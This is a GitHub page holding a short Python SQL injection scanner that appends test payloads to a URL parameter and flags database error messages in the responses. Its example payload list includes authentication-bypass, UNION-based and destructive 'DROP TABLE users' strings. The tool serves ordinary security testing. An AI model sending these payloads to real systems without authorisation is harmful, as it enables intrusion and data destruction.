Sera-Vulnerability_Scanner/sql_Injection_Scanner.py at master · Youbey/Sera-Vulnerability_Scanner · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# sql scanner - detect sql injection vulnerabilities
import requests

def test_sqli(url, payloads):
    vulnerabilities = []
    for payload in payloads:
        test_url = f"{url}?id={payload}"
        try:
            response = requests.get(test_url)
            if any(error in response.text.lower() for error in ["sql syntax", "mysql", "syntax error", "unclosed quotation"]):
                vulnerabilities.append({"payload": payload, "severity": "Critical", "url": test_url})
        except requests.exceptions.RequestException as e:
            vulnerabilities.append({"error": f"SQLi Scanner Error: {e}", "severity": "High"})
    return vulnerabilities

# Example payloads
sqli_payloads = [
    "' OR '1'='1",
    "' OR 1=1--",
    "'; DROP TABLE users--",
    "' UNION SELECT null, version()--"
]

# Example usage
if __name__ == "__main__":
    url = "http://example.com/login"
    print("SQLi Vulnerabilities:", test_sqli(url, sqli_payloads))